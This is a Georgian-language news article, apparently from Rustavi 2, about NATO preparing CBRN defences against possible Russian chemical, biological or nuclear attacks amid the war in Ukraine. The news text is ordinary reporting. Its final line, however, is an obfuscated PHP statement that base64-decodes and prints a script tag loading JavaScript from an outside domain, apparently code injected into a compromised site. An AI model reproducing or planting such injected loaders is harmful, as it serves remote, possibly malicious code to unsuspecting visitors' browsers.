celsiusi
ავერსი საქკაბელი
უკრაინის პარალელურად რუსეთმა შესაძლოა იერიში პოლონეთზე მიიტანოს, რაც ავტომატურად ნიშნავს NATO-ს უშუალოდ ჩართვას სამხედრო კონფლიქტში. უფრო დიდი საფრთხეა რუსეთის მიერ ქიმიური ან ბიოლოგიური იარაღის გამოყენების შესაძლებლობა, დღის წესრიგიდან არ იხსნება მოსკოვის ბირთვული მუქარა.
 
სანამ ბრიუსელში ლიდერები გამოსავალზე მსჯელობენ, ვაშინგტონში თეთრმა სახლმა ნაციონალური უსაფრთხოების სპეც ჯგუფი მოიწვია, რომელიც სხვადასხვა სცენარს იმ შემთხვევისთვის ამუშავებს, თუ მოსკოვმა მართლაც გამოიყენა ქიმიური, ბიოლოგიური ან ატომური იარაღი. ე.წ "ვეფხვების გუნდი", როგორც წესი, მაშინ იკრიბება, როდესაც ვითარება უკიდურესად გამწვავებულია და სწრაფი პასუხის მოსაფიქრებელი.
 
NATO ქიმიური, ბიოლოგიური, რადიოლოგიური და რაც მთავარია, ბირთვული საფრთხეებისთვის იწყებს მზადებას. მიზეზი კრემლის სახიფათო რიტორიკაა, რომლის საპასუხოდაც ალიანსმა დღეს ცნობილი გახადა, რომ NATO-ს გენერალიტეტმა ამ მიმართულებებით მზაობის გაზრდის გადაწყვეტილება მიიღო. უკვე გააქტიურა ქიმიური, ბიოლოგიური, რადიოლოგიური და ბირთვული დაცვის ელემენტები. 
 
ეს აღჭურვილობა იენს სტოლტენბერგის თქმით, ქიმიური საფრთხის გამოსავლენ ხელსაწყოებს გულისხმობს; თავდაცვით და სამედიცინო დახმარებას, ასევე ტრენინგებს კრიზისის მენეჯმენტის კუთხით უკრაინელებისთვის. 
 
NATO-ში კარგად ხვდებიან, რომ თუ რუსეთმა ქიმიური იარაღი მართლაც გამოიყენა, ეს კატასტროფა იქნება არა მხოლოდ უკრაინისთვის, არამედ მათთვისაც. ამის ფონზე კიდევ უფრო მასშტაბურ საფრთხეებზე მიანიშნებს რუსი დიპლომატის რიტორიკა გაეროში, რომელმაც "სკაი ნიუსთან" ინტერვიუში არ გამორიცხა, რომ მოსკოვი ბირთვულ იარაღს გამოიყენებს. მიზეზი ამისთვის უკვე ნაპოვნიც აქვს. 
 
სწორედ ამას აკეთებს NATO - რუსეთის ყველა პოტენციურ ნაბიჯს განიხილავს და პრევენციულ ზომებს იღებს. ამასთან, მინიშნებები მხოლოდ მოსკოვიდან არ ისმის. ბრიუსელიც ახსენებს რუსეთს, რომ მეორე მსოფლიო ომის შემდეგ NATO ყველაზე ძლიერი სამხედრო ალიანსია და ეს გასათვალისწინებელია.
 
ბრიუსელის შემდეგ ვიდრე ზაფხულში მადრიდში შეიკრიბებიან, მოცემული გეოპოლიტიკური ვითარება NATO-ელებს სავარაუდოდ კიდევ ბევრჯერ შეკრიბავს. მანამდე მათ დღევანდელ ერთობლივ განცხადებაშიც მკაფიოდ წერია, რომ რუსეთის მხრიდან ე.წ. "ცრუ დროშის" სიმულაციურ პროვოკაციებს ყველანაირი ძალით უპასუხებენ და უკრაინას მარტო არავინ დატოვებს.
 
წყარო:რუსთავი 2
1184
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");